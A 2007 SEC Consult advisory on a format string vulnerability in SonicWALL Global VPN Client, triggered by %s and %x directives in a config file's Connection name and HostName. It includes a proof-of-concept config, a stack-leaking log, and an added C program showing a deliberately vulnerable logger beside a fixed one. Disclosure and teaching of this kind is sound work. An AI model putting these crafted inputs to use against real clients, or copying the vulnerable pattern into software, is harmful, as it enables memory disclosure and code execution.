SEC Consult Security Advisory < 20071204-0 >

==============================================

title: SonicWALL Global VPN Client Format String Vulnerability

program: SonicWALL Global VPN Client

vulnerable version: < 4.0.0.830

homepage: www.sonicwall.com

found: 2007-06-12

by: lofi42*

==============================================

 

Vendor description:

---------------

 

The SonicWALL Global VPN Client provides mobile users with access to mission-critical network resources by establishing secure connections to their office network's IPSec-compliant SonicWALL VPN gateway.

 

 

Vulnerability overview:

---------------

 

SonicWALL Global VPN Client suffers from a format string vulnerability that can be triggered by supplying a specially crafted configuration file. This vulnerability could allow an attacker to execute arbitrary code in the context of the vulnerable client. For a successful attack, the attacker would have to entice the victim into importing the crafted configuration file.

 

 

Vulnerability details:

---------------

 

Format string errors occur when the client parses the "name" attribute of the "Connection" tag and the content of the "HostName" tag in the configuration file: both values end up being passed to a printf-style function as the format string instead of as an argument, so any conversion directives they contain are interpreted.

 

Examples:

 

<Connection name=%s%s%s%s>

<HostName>%s%s%s%s</HostName>

 

The bug has been verified in versions 3.1.556 and 4.0.0.810 (beta). With version 3.1.556 the client has to initiate a connection to trigger the vulnerability, whereas with the 4.0.0.810 beta the bug is triggered by simply double-clicking the configuration file. The difference is that the 4.0 version writes the imported configuration to an additional debug log, so the crafted values reach the vulnerable function during import.

 

 

Proof-of-concept:

---------------

 

In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted config file and then viewing the debug logfile. A configuration like this...

 

<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

.%x.%x.%x.%x.%x.%x.%x

 

...yields the following logfile:

 

----------------------< Connection name >-----------------------------------

OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.

46413139.203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.

65685427.6e6f6320.7463656e.206e6f69.41414122.41414141.25414141

" has been enabled.' ''

----------------------</Connection name >-----------------------------------

----------------------<HostName>--------------------------------------------

BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.

2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.

252e7825.78252e78.2e78252e.74207825.6e61206f.20504920.72646461.

2e737365.42272027.42424242.42424242'

----------------------</HostName>---------------------------------------
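The following C program is an added illustration and is not SonicWALL code or SEC Consult's proof of concept. It models the bug class in the shape the logfile above suggests: a "connection enabled" message is assembled from the Connection name with a literal format string (safe), and the finished message is then handed to a printf-style logger that treats it as a format string (the bug), so each %x consumes a word from the stack, as in the OnLogMessage() output. The configuration text, the field extractor and the two log sinks are assumptions made for this example; the real client's parser and logger are not public.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Constructed configuration in the shape the advisory describes (a Connection
 * name attribute and a HostName element carrying %x directives). Not a real
 * Global VPN Client export. */
static const char kPocConfig[] =
    "<Connection name=AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x>\n"
    "<HostName>BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x</HostName>\n"
    "</Connection>\n";

/* Copy the text between 'open' and 'close' into out. A deliberately tiny
 * stand-in for the client's real configuration parser (assumption).
 * Returns 1 on success, 0 if the field is absent. */
static int extract_field(const char *cfg, const char *open, const char *close,
                         char *out, size_t outlen)
{
    const char *p = strstr(cfg, open);
    if (p == NULL) return 0;
    p += strlen(open);
    const char *q = strstr(p, close);
    if (q == NULL) return 0;
    size_t n = (size_t)(q - p);
    if (n >= outlen) n = outlen - 1;   /* truncate rather than overflow */
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}

/* Count printf conversion directives in attacker-controlled text ("%%" is a
 * literal percent sign, not a directive). */
static int count_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        n++;
    }
    return n;
}

/* VULNERABLE sink: a printf-style logger whose format argument is the
 * already-assembled message, so every '%' that came from the config file is
 * interpreted. Reading variadic arguments that were never passed is undefined
 * behaviour; on a typical x86-64 build each %x prints a word of the caller's
 * stack, which is what the advisory's logfile shows. */
static void log_vulnerable(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
}

/* FIXED sink: the format string is always a literal; data travels only through
 * a %s argument, so directives inside it are printed, never interpreted. */
static void log_fixed(char *out, size_t outlen, const char *msg)
{
    snprintf(out, outlen, "%s", msg);
}

/* Emit the "connection enabled" log line for the Connection name found in cfg,
 * through either sink. Returns 1 if the emitted line still carries the
 * attacker's directives verbatim (not interpreted), 0 if they were consumed,
 * -1 if the config has no Connection name. */
static int log_connection_enabled(const char *cfg, int use_fixed_sink,
                                  char *out, size_t outlen)
{
    char name[256];
    char msg[512];
    if (!extract_field(cfg, "<Connection name=", ">", name, sizeof name))
        return -1;
    /* Safe so far: 'name' is a %s argument to a literal format... */
    snprintf(msg, sizeof msg, "The connection \"%s\" has been enabled.", name);
    /* ...the bug is handing the result to a sink that treats it as a format. */
    if (use_fixed_sink)
        log_fixed(out, outlen, msg);
    else
        log_vulnerable(out, outlen, msg);
    return strcmp(out, msg) == 0;
}

int main(void)
{
    char name[256], host[256], line[1024];

    extract_field(kPocConfig, "<Connection name=", ">", name, sizeof name);
    extract_field(kPocConfig, "<HostName>", "</HostName>", host, sizeof host);
    printf("directives in name: %d, in host: %d\n",
           count_directives(name), count_directives(host));

    log_connection_enabled(kPocConfig, 0, line, sizeof line);
    printf("vulnerable sink: %s\n", line);   /* stack words where the %x's were */
    log_connection_enabled(kPocConfig, 1, line, sizeof line);
    printf("fixed sink:      %s\n", line);   /* directives printed verbatim */
    return 0;
}
```

Compile with `gcc -Wall -Wformat=2` and the vulnerable sink's `vsnprintf` call will not be flagged, because the logger hides the non-literal format behind a `va_list`; this is why such bugs survive in shipped code. The count_directives() check is a useful import-time guard for a configuration format that never legitimately needs a '%', but the real fix is the one in log_fixed(): never let data become the format.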

 

 

vendor status:

---------------

vendor notified: 2007-08-16

vendor response: 2007-08-29

patch available: 2007-11-26

 

The issue has been fixed in SonicWALL Global VPN Client 4.0.0.830.